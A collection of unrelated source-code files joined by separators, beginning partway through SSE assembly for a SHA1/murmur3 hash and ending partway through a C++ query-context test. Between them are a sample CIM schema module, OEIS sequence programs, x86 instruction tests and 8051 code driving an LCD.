mov mur_data1, [mur_in_p]
mov mur_data2, [mur_in_p + 8]
pslld W16, 1
psrld %%regF, (32-1)
por %%regF, W16
ROTATE_W
movdqa [%%data + ((%%memW - 0) & 15) * 16],%%regF
imul mur_data1, mur_c1_r
paddd %%regE,%%regF
movdqa %%regT,%%regA
PROLD %%regT,5, %%regF
paddd %%regE,%%regT
%%MAGIC %%regF,%%regB,%%regC,%%regD,%%regT ;; FUN = MAGIC_Fi(B,C,D)
imul mur_data2, mur_c2_r
PROLD %%regB,30, %%regT
paddd %%regE,%%regF
%endmacro
%macro SHA1_STEP_16_79_1 11
%define %%regA %1
%define %%regB %2
%define %%regC %3
%define %%regD %4
%define %%regE %5
%define %%regT %6
%define %%regF %7
%define %%memW %8
%define %%immCNT %9
%define %%MAGIC %10
%define %%data %11
paddd %%regE,%%immCNT
rol mur_data1, R1
movdqa W14, [%%data + ((%%memW - 14) & 15) * 16]
pxor W16, W14
pxor W16, [%%data + ((%%memW - 8) & 15) * 16]
pxor W16, [%%data + ((%%memW - 3) & 15) * 16]
movdqa %%regF, W16
pslld W16, 1
rol mur_data2, R2
psrld %%regF, (32-1)
por %%regF, W16
ROTATE_W
movdqa [%%data + ((%%memW - 0) & 15) * 16],%%regF
imul mur_data1, mur_c2_r
paddd %%regE,%%regF
movdqa %%regT,%%regA
PROLD %%regT,5, %%regF
paddd %%regE,%%regT
%%MAGIC %%regF,%%regB,%%regC,%%regD,%%regT ;; FUN = MAGIC_Fi(B,C,D)
imul mur_data2, mur_c1_r
PROLD %%regB,30, %%regT
add mur_in_p, 16
paddd %%regE,%%regF
%endmacro
%macro SHA1_STEP_16_79_2 11
%define %%regA %1
%define %%regB %2
%define %%regC %3
%define %%regD %4
%define %%regE %5
%define %%regT %6
%define %%regF %7
%define %%memW %8
%define %%immCNT %9
%define %%MAGIC %10
%define %%data %11
paddd %%regE,%%immCNT
movdqa W14, [%%data + ((%%memW - 14) & 15) * 16]
xor mur_hash1, mur_data1
pxor W16, W14
pxor W16, [%%data + ((%%memW - 8) & 15) * 16]
pxor W16, [%%data + ((%%memW - 3) & 15) * 16]
rol mur_hash1, R3
movdqa %%regF, W16
pslld W16, 1
psrld %%regF, (32-1)
por %%regF, W16
ROTATE_W
movdqa [%%data + ((%%memW - 0) & 15) * 16],%%regF
add mur_hash1, mur_hash2
paddd %%regE,%%regF
movdqa %%regT,%%regA
PROLD %%regT,5, %%regF
lea mur_hash1, [mur_hash1 + mur_hash1*4 + N1]
paddd %%regE,%%regT
%%MAGIC %%regF,%%regB,%%regC,%%regD,%%regT ;; FUN = MAGIC_Fi(B,C,D)
PROLD %%regB,30, %%regT
paddd %%regE,%%regF
%endmacro
%macro SHA1_STEP_16_79_3 11
%define %%regA %1
%define %%regB %2
%define %%regC %3
%define %%regD %4
%define %%regE %5
%define %%regT %6
%define %%regF %7
%define %%memW %8
%define %%immCNT %9
%define %%MAGIC %10
%define %%data %11
paddd %%regE,%%immCNT
movdqa W14, [%%data + ((%%memW - 14) & 15) * 16]
xor mur_hash2, mur_data2
pxor W16, W14
pxor W16, [%%data + ((%%memW - 8) & 15) * 16]
pxor W16, [%%data + ((%%memW - 3) & 15) * 16]
rol mur_hash2, R4
movdqa %%regF, W16
pslld W16, 1
psrld %%regF, (32-1)
por %%regF, W16
ROTATE_W
movdqa [%%data + ((%%memW - 0) & 15) * 16],%%regF
add mur_hash2, mur_hash1
paddd %%regE,%%regF
movdqa %%regT,%%regA
PROLD %%regT,5, %%regF
paddd %%regE,%%regT
%%MAGIC %%regF,%%regB,%%regC,%%regD,%%regT ;; FUN = MAGIC_Fi(B,C,D)
PROLD %%regB,30, %%regT
lea mur_hash2, [mur_hash2 + mur_hash2*4 + N2]
paddd %%regE,%%regF
%endmacro
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
%ifidn __OUTPUT_FORMAT__, elf64
; Linux
%define arg0 rdi
%define arg1 rsi
%define arg2 rdx
%define arg3 rcx
%define arg4 r8d
%define arg5 r9
%define tmp1 r10
%define tmp2 r11
%define tmp3 r12 ; must be saved and restored
%define tmp4 r13 ; must be saved and restored
%define tmp5 r14 ; must be saved and restored
%define tmp6 r15 ; must be saved and restored
%define tmp7 rbx ; must be saved and restored
%define tmp8 rbp ; must be saved and restored
%define return rax
%define func(x) x:
%macro FUNC_SAVE 0
push r12
push r13
push r14
push r15
push rbx
push rbp
%endmacro
%macro FUNC_RESTORE 0
pop rbp
pop rbx
pop r15
pop r14
pop r13
pop r12
%endmacro
%else
; Windows
%define arg0 rcx
%define arg1 rdx
%define arg2 r8
%define arg3 r9
%define arg4 r10d
%define arg5 r11
%define tmp1 r12 ; must be saved and restored
%define tmp2 r13 ; must be saved and restored
%define tmp3 r14 ; must be saved and restored
%define tmp4 r15 ; must be saved and restored
%define tmp5 rdi ; must be saved and restored
%define tmp6 rsi ; must be saved and restored
%define tmp7 rbx ; must be saved and restored
%define tmp8 rbp ; must be saved and restored
%define return rax
%define stack_size 10*16 + 9*8 ; must be an odd multiple of 8
%define PS 8
%define arg(x) [rsp + stack_size + PS + PS*x]
%define func(x) proc_frame x
%macro FUNC_SAVE 0
alloc_stack stack_size
save_xmm128 xmm6, 0*16
save_xmm128 xmm7, 1*16
save_xmm128 xmm8, 2*16
save_xmm128 xmm9, 3*16
save_xmm128 xmm10, 4*16
save_xmm128 xmm11, 5*16
save_xmm128 xmm12, 6*16
save_xmm128 xmm13, 7*16
save_xmm128 xmm14, 8*16
save_xmm128 xmm15, 9*16
save_reg r12, 10*16 + 0*8
save_reg r13, 10*16 + 1*8
save_reg r14, 10*16 + 2*8
save_reg r15, 10*16 + 3*8
save_reg rdi, 10*16 + 4*8
save_reg rsi, 10*16 + 5*8
save_reg rbx, 10*16 + 6*8
save_reg rbp, 10*16 + 7*8
end_prolog
mov arg4, arg(4)
%endmacro
%macro FUNC_RESTORE 0
movdqa xmm6, [rsp + 0*16]
movdqa xmm7, [rsp + 1*16]
movdqa xmm8, [rsp + 2*16]
movdqa xmm9, [rsp + 3*16]
movdqa xmm10, [rsp + 4*16]
movdqa xmm11, [rsp + 5*16]
movdqa xmm12, [rsp + 6*16]
movdqa xmm13, [rsp + 7*16]
movdqa xmm14, [rsp + 8*16]
movdqa xmm15, [rsp + 9*16]
mov r12, [rsp + 10*16 + 0*8]
mov r13, [rsp + 10*16 + 1*8]
mov r14, [rsp + 10*16 + 2*8]
mov r15, [rsp + 10*16 + 3*8]
mov rdi, [rsp + 10*16 + 4*8]
mov rsi, [rsp + 10*16 + 5*8]
mov rbx, [rsp + 10*16 + 6*8]
mov rbp, [rsp + 10*16 + 7*8]
add rsp, stack_size
%endmacro
%endif
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
%define loops arg4
;variables of mh_sha1
%define mh_in_p arg0
%define mh_digests_p arg1
%define mh_data_p arg2
%define mh_segs tmp1
;variables of murmur3
%define mur_in_p tmp2
%define mur_digest_p arg3
%define mur_hash1 tmp3
%define mur_hash2 tmp4
%define mur_data1 tmp5
%define mur_data2 return
%define mur_c1_r tmp6
%define mur_c2_r arg5
; constants of murmur3_x64_128
%define R1 31
%define R2 33
%define R3 27
%define R4 31
%define M 5
%define N1 0x52dce729;DWORD
%define N2 0x38495ab5;DWORD
%define C1 QWORD(0x87c37b91114253d5)
%define C2 QWORD(0x4cf5ad432745937f)
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;variables used by storing segs_digests on stack
%define RSP_SAVE tmp7
%define FRAMESZ 4*5*16 ;BYTES*DWORDS*SEGS
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
%define MOVPS movups
%define A xmm0
%define B xmm1
%define C xmm2
%define D xmm3
%define E xmm4
%define F xmm5 ; tmp
%define G xmm6 ; tmp
%define TMP G
%define FUN F
%define K xmm7
%define AA xmm8
%define BB xmm9
%define CC xmm10
%define DD xmm11
%define EE xmm12
%define T0 xmm6
%define T1 xmm7
%define T2 xmm8
%define T3 xmm9
%define T4 xmm10
%define T5 xmm11
%macro ROTATE_ARGS 0
%xdefine TMP_ E
%xdefine E D
%xdefine D C
%xdefine C B
%xdefine B A
%xdefine A TMP_
%endm
%define W14 xmm13
%define W15 xmm14
%define W16 xmm15
%macro ROTATE_W 0
%xdefine TMP_ W16
%xdefine W16 W15
%xdefine W15 W14
%xdefine W14 TMP_
%endm
;init hash digests
; segs_digests:low addr-> high_addr
; a | b | c | ...| p | (16)
; h0 | h0 | h0 | ...| h0 | | Aa| Ab | Ac |...| Ap |
; h1 | h1 | h1 | ...| h1 | | Ba| Bb | Bc |...| Bp |
; ....
; h5 | h5 | h5 | ...| h5 | | Ea| Eb | Ec |...| Ep |
align 32
;void mh_sha1_murmur3_x64_128_block_sse (const uint8_t * input_data,
; uint32_t mh_sha1_digests[SHA1_DIGEST_WORDS][HASH_SEGS],
; uint8_t frame_buffer[MH_SHA1_BLOCK_SIZE],
; uint32_t murmur3_x64_128_digests[MURMUR3_x64_128_DIGEST_WORDS],
; uint32_t num_blocks);
; arg 0 pointer to input data
; arg 1 pointer to digests, include segments digests(uint32_t digests[16][5])
; arg 2 pointer to aligned_frame_buffer which is used to save the big_endian data.
; arg 3 pointer to murmur3 digest
; arg 4 number of 1KB blocks
;
mk_global mh_sha1_murmur3_x64_128_block_sse, function, internal
func(mh_sha1_murmur3_x64_128_block_sse)
FUNC_SAVE
; save rsp
mov RSP_SAVE, rsp
cmp loops, 0
jle .return
; leave enough space to store segs_digests
sub rsp, FRAMESZ
; align rsp to 16 Bytes needed by sse
and rsp, ~0x0F
%assign I 0 ; copy segs_digests into stack
%rep 5
MOVPS A, [mh_digests_p + I*64 + 16*0]
MOVPS B, [mh_digests_p + I*64 + 16*1]
MOVPS C, [mh_digests_p + I*64 + 16*2]
MOVPS D, [mh_digests_p + I*64 + 16*3]
movdqa [rsp + I*64 + 16*0], A
movdqa [rsp + I*64 + 16*1], B
movdqa [rsp + I*64 + 16*2], C
movdqa [rsp + I*64 + 16*3], D
%assign I (I+1)
%endrep
;init murmur variables
mov mur_in_p, mh_in_p ;different steps between murmur and mh_sha1
;load murmur hash digests and multiplier
mov mur_hash1, [mur_digest_p]
mov mur_hash2, [mur_digest_p + 8]
mov mur_c1_r, C1
mov mur_c2_r, C2
.block_loop:
;transform to big-endian data and store on aligned_frame
movdqa F, [PSHUFFLE_BYTE_FLIP_MASK]
;transform input data from DWORD*16_SEGS*5 to DWORD*4_SEGS*5*4
%assign I 0
%rep 16
MOVPS T0,[mh_in_p+I*64+0*16]
MOVPS T1,[mh_in_p+I*64+1*16]
MOVPS T2,[mh_in_p+I*64+2*16]
MOVPS T3,[mh_in_p+I*64+3*16]
pshufb T0, F
movdqa [mh_data_p+(I)*16 +0*256],T0
pshufb T1, F
movdqa [mh_data_p+(I)*16 +1*256],T1
pshufb T2, F
movdqa [mh_data_p+(I)*16 +2*256],T2
pshufb T3, F
movdqa [mh_data_p+(I)*16 +3*256],T3
%assign I (I+1)
%endrep
mov mh_segs, 0 ;start from the first 4 segments
.segs_loop:
;; Initialize digests
movdqa A, [rsp + 0*64 + mh_segs]
movdqa B, [rsp + 1*64 + mh_segs]
movdqa C, [rsp + 2*64 + mh_segs]
movdqa D, [rsp + 3*64 + mh_segs]
movdqa E, [rsp + 4*64 + mh_segs]
movdqa AA, A
movdqa BB, B
movdqa CC, C
movdqa DD, D
movdqa EE, E
;;
;; perform 0-79 steps
;;
movdqa K, [K00_19]
;; do rounds 0...15
%assign I 0
%rep 16
SHA1_STEP_00_15 A,B,C,D,E, TMP,FUN, I, K, MAGIC_F0, mh_data_p
ROTATE_ARGS
%assign I (I+1)
%endrep
;; do rounds 16...19
movdqa W16, [mh_data_p + ((16 - 16) & 15) * 16]
movdqa W15, [mh_data_p + ((16 - 15) & 15) * 16]
%rep 4
%assign J (I % 4)
SHA1_STEP_16_79(J) A,B,C,D,E, TMP,FUN, I, K, MAGIC_F0, mh_data_p
ROTATE_ARGS
%assign I (I+1)
%endrep
;; do rounds 20...39
movdqa K, [K20_39]
%rep 20
%assign J (I % 4)
SHA1_STEP_16_79(J) A,B,C,D,E, TMP,FUN, I, K, MAGIC_F1, mh_data_p
ROTATE_ARGS
%assign I (I+1)
%endrep
;; do rounds 40...59
movdqa K, [K40_59]
%rep 20
%assign J (I % 4)
SHA1_STEP_16_79(J) A,B,C,D,E, TMP,FUN, I, K, MAGIC_F2, mh_data_p
ROTATE_ARGS
%assign I (I+1)
%endrep
;; do rounds 60...79
movdqa K, [K60_79]
%rep 20
%assign J (I % 4)
SHA1_STEP_16_79(J) A,B,C,D,E, TMP,FUN, I, K, MAGIC_F3, mh_data_p
ROTATE_ARGS
%assign I (I+1)
%endrep
paddd A, AA
paddd B, BB
paddd C, CC
paddd D, DD
paddd E, EE
; write out digests
movdqa [rsp + 0*64 + mh_segs], A
movdqa [rsp + 1*64 + mh_segs], B
movdqa [rsp + 2*64 + mh_segs], C
movdqa [rsp + 3*64 + mh_segs], D
movdqa [rsp + 4*64 + mh_segs], E
add mh_data_p, 256
add mh_segs, 16
cmp mh_segs, 64
jc .segs_loop
sub mh_data_p, (1024)
add mh_in_p, (1024)
sub loops, 1
jne .block_loop
;store murmur-hash digest
mov [mur_digest_p], mur_hash1
mov [mur_digest_p + 8], mur_hash2
%assign I 0 ; copy segs_digests back to mh_digests_p
%rep 5
movdqa A, [rsp + I*64 + 16*0]
movdqa B, [rsp + I*64 + 16*1]
movdqa C, [rsp + I*64 + 16*2]
movdqa D, [rsp + I*64 + 16*3]
MOVPS [mh_digests_p + I*64 + 16*0], A
MOVPS [mh_digests_p + I*64 + 16*1], B
MOVPS [mh_digests_p + I*64 + 16*2], C
MOVPS [mh_digests_p + I*64 + 16*3], D
%assign I (I+1)
%endrep
mov rsp, RSP_SAVE ; restore rsp
.return:
FUNC_RESTORE
ret
endproc_frame
section .data align=16
align 16
PSHUFFLE_BYTE_FLIP_MASK: dq 0x0405060700010203, 0x0c0d0e0f08090a0b
K00_19: dq 0x5A8279995A827999, 0x5A8279995A827999
K20_39: dq 0x6ED9EBA16ED9EBA1, 0x6ED9EBA16ED9EBA1
K40_59: dq 0x8F1BBCDC8F1BBCDC, 0x8F1BBCDC8F1BBCDC
K60_79: dq 0xCA62C1D6CA62C1D6, 0xCA62C1D6CA62C1D6
|
//%2005////////////////////////////////////////////////////////////////////////
//
// Copyright (c) 2000, 2001, 2002 BMC Software; Hewlett-Packard Development
// Company, L.P.; IBM Corp.; The Open Group; Tivoli Systems.
// Copyright (c) 2003 BMC Software; Hewlett-Packard Development Company, L.P.;
// IBM Corp.; EMC Corporation, The Open Group.
// Copyright (c) 2004 BMC Software; Hewlett-Packard Development Company, L.P.;
// IBM Corp.; EMC Corporation; VERITAS Software Corporation; The Open Group.
// Copyright (c) 2005 Hewlett-Packard Development Company, L.P.; IBM Corp.;
// EMC Corporation; VERITAS Software Corporation; The Open Group.
//
// Permission is hereby granted, free of charge, to any person obtaining a copy
// of this software and associated documentation files (the "Software"), to
// deal in the Software without restriction, including without limitation the
// rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
// sell copies of the Software, and to permit persons to whom the Software is
// furnished to do so, subject to the following conditions:
//
// THE ABOVE COPYRIGHT NOTICE AND THIS PERMISSION NOTICE SHALL BE INCLUDED IN
// ALL COPIES OR SUBSTANTIAL PORTIONS OF THE SOFTWARE. THE SOFTWARE IS PROVIDED
// "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT
// LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
// PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
// HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
// ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
// WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
//
//==============================================================================
//
// Author: Sushma Fernandes, Hewlett-Packard Company
// (sushma_fernandes@hp.com)
//
//%/////////////////////////////////////////////////////////////////////////////
#include "SampleSSPModule.h"
PEGASUS_USING_STD;
PEGASUS_NAMESPACE_BEGIN
static const String _REQUIRED_QUAL_NAME = "Required";
SampleSSPModule::SampleSSPModule()
{
}
SampleSSPModule::~SampleSSPModule()
{
}
/**
Performs special processing on a qualifier.
@param CIMQualifier qualifier.
@return CIMQualifier updated qualifier.
*/
Boolean SampleSSPModule::processQualifier (CIMQualifierDecl& inputQual,
CIMQualifierDecl& outputQual)
{
return true;
}
/**
Interface for special processing on a class.
*/
Boolean SampleSSPModule::processClass (CIMClass& inputClass,
CIMClass& outputClass)
{
/* This is a sample implementation to update a CIM Class
Uncomment for implementation
//
// Check if the input class defines "Required" qualifier and
// if the flavor on the qualifier is set to OVERRIDABLE.
// If true unset it in the output class.
//
Uint32 count = inputClass.getQualifierCount();
for ( Uint32 i = 0; i < count; i++ )
{
CIMQualifier q = inputClass.getQualifier(i);
if ( q.getName() == _REQUIRED_QUAL_NAME )
{
// change the qualifier flavor
if ( q.getFlavor().hasFlavor( CIMFlavor::OVERRIDABLE))
{
q.unsetFlavor (CIMFlavor::OVERRIDABLE);
outputClass.removeQualifier(i);
outputClass.addQualifier(q);
}
}
}
//
// Check if any property defines "Required" qualifier.
//
Array<CIMProperty> cimProperty;
for ( Uint32 i = 0; i < inputClass.getPropertyCount(); i++ )
{
CIMProperty p = inputClass.getProperty(i);
Uint32 qualCount = p.getQualifierCount();
for ( Uint32 qctr = 0; qctr < qualCount; qctr++)
{
CIMQualifier q = p.getQualifier(qctr);
if ( q.getName() == _REQUIRED_QUAL_NAME )
{
// change the qualifier flavor
if ( q.getFlavor().hasFlavor(
CIMFlavor::OVERRIDABLE))
{
q.unsetFlavor (CIMFlavor::OVERRIDABLE);
p.removeQualifier(qctr);
p.addQualifier(q);
cimProperty.append(p);
break;
}
}
}
}
for ( Uint32 i=0; i<cimProperty.size(); i++)
{
Uint32 pos = outputClass.findProperty(cimProperty[i].getName());
outputClass.removeProperty(pos);
outputClass.addProperty (cimProperty[i]);
}
//
// Check if any Method defines "Required" qualifier.
//
for ( Uint32 i = 0; i < inputClass.getMethodCount(); i++ )
{
CIMMethod m = inputClass.getMethod (i);
Uint32 qualCount = m.getQualifierCount();
for ( Uint32 qctr = 0; qctr < qualCount; qctr++)
{
CIMQualifier q = m.getQualifier(qctr);
if ( q.getName() == _REQUIRED_QUAL_NAME )
{
// change the qualifier flavor
if ( q.getFlavor().hasFlavor(
CIMFlavor::OVERRIDABLE))
{
q.unsetFlavor (CIMFlavor::OVERRIDABLE);
outputClass.removeMethod (i);
outputClass.addMethod (m);
}
break;
}
}
}
//
// Check if any Method parameter defines
// "Required" qualifier.
//
for ( Uint32 i = 0; i < inputClass.getMethodCount(); i++ )
{
CIMMethod m = inputClass.getMethod (i);
// Check the method parameters.
Boolean methodChanged = false;
Uint32 paramCount = m.getParameterCount();
for ( Uint32 pctr = 0; pctr < paramCount; pctr++)
{
CIMParameter p1 = m.getParameter(pctr);
Uint32 pqCount = p1.getQualifierCount();
for ( Uint32 pqctr = 0; pqctr < pqCount; pqctr++)
{
CIMQualifier q = p1.getQualifier(pqctr);
if ( q.getName() == _REQUIRED_QUAL_NAME )
{
// change the qualifier flavor
if ( q.getFlavor().hasFlavor
( CIMFlavor::OVERRIDABLE))
{
q.unsetFlavor (CIMFlavor::OVERRIDABLE);
methodChanged = true;
p1.removeQualifier(pqctr);
p1.addQualifier (q);
m.removeParameter(pctr);
m.addParameter(p1);
}
break;
}
}
}
if ( methodChanged)
{
outputClass.removeMethod (i);
outputClass.addMethod (m);
}
}
Uncomment for implementation */
return true;
}
/**
Interface for special processing on an instance.
*/
Boolean SampleSSPModule::processInstance (CIMInstance& inputInstance,
CIMInstance& outputInstance)
{
/* This is a sample implementation to update a CIM Instance.
Uncomment for implementation
Array<CIMProperty> cimProperty;
//
// Check if the input instance defines "Required" qualifier and
// if the flavor on the qualifier is set to OVERRIDABLE.
// If true unset it in the output instance.
//
for ( Uint32 i = 0; i < inputInstance.getPropertyCount(); i++ )
{
CIMProperty p = inputInstance.getProperty (i);
Uint32 qualCount = p.getQualifierCount();
for ( Uint32 qctr = 0; qctr < qualCount; qctr++)
{
CIMQualifier q = p.getQualifier(qctr);
if ( q.getName() == _REQUIRED_QUAL_NAME)
{
// change the qualifier flavor
if ( q.getFlavor().hasFlavor(
CIMFlavor::OVERRIDABLE))
{
q.unsetFlavor (CIMFlavor::OVERRIDABLE);
p.removeQualifier(qctr);
p.addQualifier(q);
cimProperty.append(p);
}
break;
}
}
}
for ( Uint32 i=0; i<cimProperty.size(); i++)
{
outputInstance.removeProperty(
outputInstance.findProperty (cimProperty[i].getName()));
outputInstance.addProperty (cimProperty[i]);
}
Uncomment for implementation */
return true;
}
extern "C" PEGASUS_EXPORT SchemaSpecialProcessModule * PegasusCreateSSPModule()
{
return(new SampleSSPModule());
}
PEGASUS_NAMESPACE_END
|
; A016892: (5n+3)^8.
; 6561,16777216,815730721,11019960576,78310985281,377801998336,1406408618241,4347792138496,11688200277601,28179280429056,62259690411361,128063081718016,248155780267521,457163239653376
mul $0,5
add $0,3
pow $0,8
|
; A086112: Denominator of the mean deviation of a discrete uniform distribution on n elements.
; 1,2,3,1,5,2,7,1,9,2,11,1,13,2,15,1,17,2,19,1,21,2,23,1,25,2,27,1,29,2,31,1,33,2,35,1,37,2,39,1,41,2,43,1,45,2,47,1,49,2,51,1,53,2,55,1,57,2,59,1,61,2,63,1,65,2,67,1,69,2,71,1,73,2,75,1,77,2,79,1,81,2,83
mov $1,$0
lpb $1
add $0,1
trn $0,$1
add $1,$0
dif $1,2
lpe
add $0,1
|
; A017746: Binomial coefficients C(n,82).
; 1,83,3486,98770,2123555,36949857,541931236,6890268572,77515521435,783768050065,7210666060598,60962903966874,477542747740513,3489735464257595,23929614612052080,154744841157936784,947812152092362802,5519611944537877494,30664510802988208300,163006083742200475700,831331027085222426070,4077480751894186185010,19275363554408880147320,87996224922301409368200,388649993406831224709550,1663421971781237641756874,6909598959706679434990092,27894306911408446607922964,109584777151961754531125930
add $0,82
bin $0,82
|
; A110213: a(n+3) = 6*a(n) - 5*a(n+2), a(0) = 1, a(1) = -7, a(2) = 35.
; Submitted by Jon Maiga
; 1,-7,35,-169,803,-3805,18011,-85237,403355,-1908709,9032123,-42740485,202250171,-957058117,4528847675,-21430737349,101411338043,-479883604165,2270833596731,-10745699955397,50849198151995,-240620989179589,1138630746165563,-5388058541915845,25496566774501691,-120651049395515077,570926895726080315,-2701655077983391429,12784369093543866683,-60496284093362851525,286271489998913909051,-1354651235433306345157,6410278472606354616635,-30333763423038289628869,143540909702591610073403
mov $2,2
mov $3,2
lpb $0
sub $0,1
mov $1,$3
mul $2,-6
sub $2,2
mov $3,$2
add $2,$1
lpe
mov $0,$3
div $0,2
|
BITS 32
;TEST_FILE_META_BEGIN
;TEST_TYPE=TEST_F
;TEST_IGNOREFLAGS=FLAG_OF|FLAG_SF|FLAG_ZF|FLAG_AF|FLAG_PF|FLAG_CF
;TEST_FILE_META_END
; allocate 16 byte aligned stack space for the packed values
lea ecx, [esp-17]
and ecx, 0xfffffff0
; load 128 bit value into xmm0
mov DWORD [ecx], 0xAABBCCDD
mov DWORD [ecx+4], 0xFFEEDDCC
mov DWORD [ecx+8], 0x11223344
mov DWORD [ecx+12], 0x55667788
movaps xmm0, [ecx]
lea ecx, [ecx+16]
;TEST_BEGIN_RECORDING
lea ecx, [esp-17]
and ecx, 0xfffffff0 ; using this requires us to ignore ALU flags
mov DWORD [ecx], 0xFFEEDDCC
mov DWORD [ecx+4], 0x77665544
mov DWORD [ecx+8], 0x99AABBCC
mov DWORD [ecx+12], 0xDDEEFF00
pshuflw xmm0, [ecx], 0x1a
mov ecx, [ecx]
mov ecx, 0
;TEST_END_RECORDING
cvtsi2sd xmm0, ecx
|
;
; Point pixel at (x,y) coordinate.
SECTION code_clib
PUBLIC w_pointxy_MODE4
defc NEEDpoint = 1
.w_pointxy_MODE4
INCLUDE "pixel_MODE4.inc"
|
; put data in RAM
MOV 30H, #'A'
MOV 31H, #'B'
MOV 32H, #'C'
MOV 33H, #0 ; end of data marker
; initialise the display
; see instruction set for details
CLR P1.3 ; clear RS - indicates that instructions are being sent to the module
; function set
CLR P1.7 ; |
CLR P1.6 ; |
SETB P1.5 ; |
CLR P1.4 ; | high nibble set
SETB P1.2 ; |
CLR P1.2 ; | negative edge on E
CALL delay ; wait for BF to clear
; function set sent for first time - tells module to go into 4-bit mode
; Why is function set high nibble sent twice? See 4-bit operation on pages 39 and 42 of HD44780.pdf.
SETB P1.2 ; |
CLR P1.2 ; | negative edge on E
; same function set high nibble sent a second time
SETB P1.7 ; low nibble set (only P1.7 needed to be changed)
SETB P1.2 ; |
CLR P1.2 ; | negative edge on E
; function set low nibble sent
CALL delay ; wait for BF to clear
; entry mode set
; set to increment with no shift
CLR P1.7 ; |
CLR P1.6 ; |
CLR P1.5 ; |
CLR P1.4 ; | high nibble set
SETB P1.2 ; |
CLR P1.2 ; | negative edge on E
SETB P1.6 ; |
SETB P1.5 ; |low nibble set
SETB P1.2 ; |
CLR P1.2 ; | negative edge on E
CALL delay ; wait for BF to clear
; display on/off control
; the display is turned on, the cursor is turned on and blinking is turned on
CLR P1.7 ; |
CLR P1.6 ; |
CLR P1.5 ; |
CLR P1.4 ; | high nibble set
SETB P1.2 ; |
CLR P1.2 ; | negative edge on E
SETB P1.7 ; |
SETB P1.6 ; |
SETB P1.5 ; |
SETB P1.4 ; | low nibble set
SETB P1.2 ; |
CLR P1.2 ; | negative edge on E
CALL delay ; wait for BF to clear
; send data
SETB P1.3 ; clear RS - indicates that data is being sent to module
MOV R1, #30H ; data to be sent to LCD is stored in 8051 RAM, starting at location 30H
loop:
MOV A, @R1 ; move data pointed to by R1 to A
JZ finish ; if A is 0, then end of data has been reached - jump out of loop
CALL sendCharacter ; send data in A to LCD module
INC R1 ; point to next piece of data
JMP loop ; repeat
finish:
JMP $
sendCharacter:
MOV C, ACC.7 ; |
MOV P1.7, C ; |
MOV C, ACC.6 ; |
MOV P1.6, C ; |
MOV C, ACC.5 ; |
MOV P1.5, C ; |
MOV C, ACC.4 ; |
MOV P1.4, C ; | high nibble set
SETB P1.2 ; |
CLR P1.2 ; | negative edge on E
MOV C, ACC.3 ; |
MOV P1.7, C ; |
MOV C, ACC.2 ; |
MOV P1.6, C ; |
MOV C, ACC.1 ; |
MOV P1.5, C ; |
MOV C, ACC.0 ; |
MOV P1.4, C ; | low nibble set
SETB P1.2 ; |
CLR P1.2 ; | negative edge on E
CALL delay ; wait for BF to clear
delay:
MOV R0, #50
DJNZ R0, $
RET
|
rcl al, 1
rcl ah, 1
rcl bl, 1
rcl bh, 1
rcl cl, 1
rcl ch, 1
rcl dl, 1
rcl dh, 1
rcl byte [bx], 1
rcl byte [bx+si], 1h
rcl byte [bx+si+12h], 1b
rcl byte [bx+si+4142h], 1
rcl al, cl
rcl ah, cl
rcl bl, cl
rcl bh, cl
rcl cl, cl
rcl ch, cl
rcl dl, cl
rcl dh, cl
rcl byte [bx], cl
rcl byte [bx+di], cl
rcl byte [bx+di+12h], cl
rcl byte [bx+di+4142h], cl
rcl ax, 1
rcl bx, 1
rcl cx, 1
rcl dx, 1
rcl si, 1
rcl di, 1
rcl bp, 1
rcl word [bx], 1
rcl word [bx+si], 1h
rcl word [bx+si+12h], 1b
rcl word [bx+si+4142h], 1
rcl ax, cl
rcl bx, cl
rcl cx, cl
rcl dx, cl
rcl si, cl
rcl di, cl
rcl bp, cl
rcl word [bx], cl
rcl word [bx+di], cl
rcl word [bx+di+12h], cl
rcl word [bx+si+12h], cl
|
/*
* Copyright 2021 Hewlett Packard Enterprise Development LP
* Other additional copyright holders may be indicated within.
*
* The entirety of this work is licensed under the Apache License,
* Version 2.0 (the "License"); you may not use this file except
* in compliance with the License.
*
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
#include "chpl/queries/Context.h"
#include "chpl/queries/UniqueString.h"
// always check assertions in this test
#ifdef NDEBUG
#undef NDEBUG
#endif
#include <chrono>
#include <fstream>
#include <sstream>
#include <string>
#include <iostream>
#include <cassert>
using namespace chpl;
static void testPerformance(Context* ctx,
const char* inputFile,
bool printTiming) {
int outerRepeat = 10;
int innerRepeat = 1;
bool dohisto = false;
int querybysize[41];
int nqueries = 0;
for(int i = 0; i < 41; i++) querybysize[i] = 0;
auto start = std::chrono::steady_clock::now();
for (int i = 0; i < outerRepeat; i++) {
std::ifstream file(inputFile);
if (file.is_open()) {
std::string line;
std::string word;
while (std::getline(file, line)) {
for (int j = 0; j < innerRepeat; j++) {
std::istringstream iss(line, std::istringstream::in);
while (iss >> word) {
